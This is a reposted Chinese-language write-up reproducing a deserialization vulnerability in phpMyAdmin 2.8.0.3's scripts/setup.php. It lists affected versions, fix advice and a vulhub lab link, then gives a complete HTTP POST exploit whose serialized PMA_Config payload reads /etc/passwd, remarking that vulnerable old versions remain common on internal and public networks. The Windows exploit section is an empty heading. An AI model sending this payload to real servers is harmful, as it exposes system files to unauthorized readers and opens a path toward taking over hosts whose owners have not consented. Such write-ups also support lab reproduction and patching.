WooYun-2016-199433 -phpmyadmin-反序列化-getshell


 

 

文章參考

http://www.mottoin.com/detail/521.html

https://www.cnblogs.com/xhds/p/12579425.html

 

雖然是很老的漏洞,但在內網大部分都是用着老版本,在外網存在的也為數不少

漏洞文件

/scripts/setup.php

影響版本

已知版本為 2.8.0.3

修復建議

盡快升級到最新版 將setup.php中28行中的"configuration"改為傳入其他值 直接刪除scripts目錄,防止被惡意攻擊。

 

環境搭建

https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433

 

 

 

復現

1.構造EXP  (Linux版)

 

 

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

 

2. 構造EXP  (Windows版)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM